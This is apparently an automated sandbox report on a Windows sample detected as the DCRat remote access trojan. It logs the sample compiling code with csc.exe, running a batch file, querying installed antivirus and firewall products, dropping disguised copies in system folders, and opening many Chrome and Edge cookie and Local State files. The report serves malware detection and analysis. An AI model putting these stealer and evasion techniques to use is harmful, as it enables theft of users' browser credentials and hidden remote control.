                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline"
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.cmdline"
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE4ED.tmp" "c:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP"
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\jW5TA1J9Z1.exe "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2519392668.00000000029CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002DDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.1",5,1,"","user","760639","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\Desktop","W32YN28 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Queries volume information: C:\Users\user\Desktop\jW5TA1J9Z1.exe VolumeInformation
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exe Queries volume information: C:\Windows\DiagTrack\RuntimeBroker.exe VolumeInformation
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe Queries volume information: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe VolumeInformation
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Queries volume information: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe VolumeInformation
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              Source: Yara match File source: 00000017.00000002.2519392668.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000000.00000002.1296629058.0000000012F88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000017.00000002.2519392668.0000000002F28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: jW5TA1J9Z1.exe PID: 3036, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: jW5TA1J9Z1.exe PID: 7840, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 7964, type: MEMORYSTR
                              Source: Yara match File source: jW5TA1J9Z1.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.jW5TA1J9Z1.exe.630000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000000.1237730669.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe, type: DROPPED
                              Source: Yara match File source: C:\Windows\AppReadiness\RuntimeBroker.exe, type: DROPPED
                              Source: Yara match File source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior

                              Remote Access Functionality

[Technique matrix; column headings: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact]
[Behavior graph] Behavior Graph ID: 1496460, Sample: jW5TA1J9Z1.exe, Startdate: 21/08/2024, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label | Link
jW5TA1J9Z1.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
jW5TA1J9Z1.exe | 100% | Avira | HEUR/AGEN.1323342
jW5TA1J9Z1.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label | Link
